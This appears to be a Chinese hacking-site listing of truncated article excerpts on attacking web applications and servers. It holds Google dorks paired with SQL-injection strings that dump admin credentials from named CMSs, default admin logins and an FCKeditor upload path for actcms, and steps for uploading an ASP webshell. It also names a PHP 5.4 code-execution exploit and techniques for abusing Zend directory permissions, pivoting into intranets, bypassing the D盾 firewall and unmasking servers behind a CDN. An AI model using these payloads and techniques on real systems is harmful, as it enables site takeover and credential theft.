良精企业通用建站系统漏洞总汇
一,SQl注入漏洞 1,典型的Cookies注入 漏洞文件:Shownews.asp 问题代码:id=cstr(request("id")) Set rsnews=Server.CreateObject("ADODB.RecordSet") sql="update news set hits=hits+1 where id="&id conn.execute sql sql="select * f...
actcms网站管理系统漏洞0day
漏洞版本:actcms3.0以下版本 默认后台路径:admin/ 默认数据库:App_Data/DataBase.mdb 默认账户:admin 默认密码: admin 利用点:FCK编译器 漏洞界面: admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=%2Fadmin%2Ffck...
shopxp网上购物系统 v7.4 SQL注入漏洞
关键字:inurl:shopxp_news.asp 注入代码:TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin 爆出用户名和密码 注意:用户名和密码是连在一起的,后十六位是密码MD5加密 adminb148...
某教育程序打印页面漏洞批量注射(附小工具)
某教育程序打印页面漏洞批量注射 inurl:info_Print.asp?ArticleID= 后台: ad_login.asp exp: union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin 为了方便我编了一个...
通过Zend目录权限不严获取执行权限
服务器上很多都装了 Zend 就算 C:\Program Files 设置过权限,安装Zend后,Zend 会自动配置目录的权限 C:\Program Files\Zend\ZendOptimizer-3.3.0 下的目录权限为 Everyone 全权,这导致入侵者能写入文件。 如果黑客入侵一个服务器,只支持 asp,或php,没有执行权限,执行组件也给禁用了,只有读写文件的权限(只要读写权限就够...
关于“高校现代教学管理系统漏洞”的攻击与防范
作者:Blackeagle 转载文章请保留版权www.blackeagle.name QQ空间和博客同时首发 前段时间在群里看到一哥们分享了一个“高校现代教学管理系统漏洞”,方法很简单,很快就能拿到webshell。 原理和fck差不多,也是利用上传功能。 ftb.imagegallery.aspx 这是一个具有上传功能的目录,添加在该网站域名后即可打开。 之后上传带有可解析的asp马(需要解析改...
PHP 5.4 (5.4.3) Code Execution (Win32)
// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32) // Exploit author: 0in (Maksymilian Motyl) // Email: 0in(dot)email(at)gmail.com // * Bug with Variant type parsing originally discovered b...
渗透内网方法之巧用代理
代理在入侵里的作用-----妙用代理,渗透内网 一、踩点 主机: https://www.webshell.cc OS:Windows 2000 + IIS 5.0 + MSSQL 端口:80 21i 数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网. 首页存在注入漏洞,sa登陆. 注入点: https://www.webshell.cc/...
如何绕过D盾进行注入
少壮不努力,长大遇啊D ----某大黑客 D盾有多不爽我就不说了,现在都是批量注入,时不时的弹出D盾提示,甚是恼人。。。。。 其实这个并不是我发现的,而是国外的一个注入工具。某日本人心血来潮,想换一个linux系统玩玩儿,在互联网上逛了一大圈,发现大半都是带马的网站,甚是不爽,准备关闭、突然一个字眼吸引了我,没错,那就是Anonymous_os,看了下简介说是匿名者做的一个linux内核的操作系统...
获取使用CDN网站的真实IP
现在很多网站用了cdn技术,在做一些测试的时候,想获取其服务器真实IP地址就有点困难,不知道现在还有其他什么好的方法呢,整理了下,目前知道如下两种: 1:拿CDN服务器 找出真实IP cache_peer 1.1.1.1 parent 80 0 no-query originserver cache_peer_domain 1.1.1.1 www.xxxx.com 2:判断HTTP_X_FORWA...